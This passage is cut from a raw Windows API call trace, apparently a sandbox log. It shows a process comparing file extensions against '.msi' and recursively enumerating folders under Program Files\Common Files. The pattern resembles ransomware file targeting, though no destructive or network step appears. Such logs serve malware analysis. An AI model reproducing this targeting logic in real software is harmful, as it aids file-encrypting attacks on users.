lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".pptm") returned 5 [0033.317] lstrcmpiW (lpString1=".pptm", lpString2="I.msi") returned -1 [0033.317] lstrlenW (lpString=".pptx") returned 5 [0033.317] lstrcmpiW (lpString1=".pptx", lpString2="I.msi") returned -1 [0033.317] lstrlenW (lpString=".prn") returned 4 [0033.317] lstrcmpiW (lpString1=".prn", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".ps") returned 3 [0033.317] lstrcmpiW (lpString1=".ps", lpString2="msi") returned -1 [0033.317] lstrlenW (lpString=".psb") returned 4 [0033.317] lstrcmpiW (lpString1=".psb", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".psd") returned 4 [0033.317] lstrcmpiW (lpString1=".psd", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".pst") returned 4 [0033.317] lstrcmpiW (lpString1=".pst", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".ptx") returned 4 [0033.317] lstrcmpiW (lpString1=".ptx", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".pub") returned 4 [0033.317] lstrcmpiW (lpString1=".pub", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".pwm") returned 4 [0033.317] lstrcmpiW (lpString1=".pwm", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".pxr") returned 4 [0033.317] lstrcmpiW (lpString1=".pxr", lpString2=".msi") returned 1 [0033.317] lstrlenW (lpString=".py") returned 3 [0033.317] lstrcmpiW (lpString1=".py", lpString2="msi") returned -1 [0033.317] lstrlenW (lpString=".qt") returned 3 [0033.317] lstrcmpiW (lpString1=".qt", lpString2="msi") returned -1 [0033.317] lstrlenW (lpString=".r3d") returned 4 [0033.317] lstrcmpiW (lpString1=".r3d", lpString2=".msi") returned 1 [0034.407] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.407] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARFR", cAlternateFileName="")) returned 1 [0034.843] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0034.843] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fb24d8 | out: hHeap=0x570000) returned 1 [0034.996] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0034.996] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0034.996] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f8 | out: hHeap=0x570000) returned 1 [0034.997] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2d148, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0034.997] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0034.997] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0034.997] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0034.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.233] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.233] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.233] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.233] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.233] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 1 [0035.233] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.233] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fb24d8 | out: hHeap=0x570000) returned 1 [0035.233] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 1 [0035.233] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.234] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.234] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0035.234] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.252] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.252] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0035.252] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.253] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.253] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 1 [0035.253] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0035.322] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.322] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.322] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1200 [0035.322] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.322] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x33feb9c | out: lpFindFileData=0x33feb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 1 [0035.323] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0035.323] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f8 | out: hHeap=0x570000) returned 1 [0035.323] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33fee18 | out: lpFindFileData=0x33fee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c366f00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x6193ae30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c366f00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x267d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0035.323] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0035.323] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fda4f0 | out: hHeap=0x570000) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0035.325] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.325] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fb24d8 | out: hHeap=0x570000) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 0 [0035.325] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.325] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0035.325] FindClose (in: hFindFile=0x3ef11c0 | out: hFindFile=0x3ef11c0) returned 1 [0035.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x3ef1180, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0035.326] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef11c0 [0035.326] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0035.326] FindClose (in: hFindFile=0x3ef11c0 | out: hFindFile=0x3ef11c0) returned 1 [0035.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fb24d8 | out: hHeap=0x570000) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x3ef1180, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0035.327] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef11c0 [0035.327] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.327] FindNextFileW (in: hFindFile=0x3ef11c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0035.327] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.371] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.371] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 1 [0035.371] 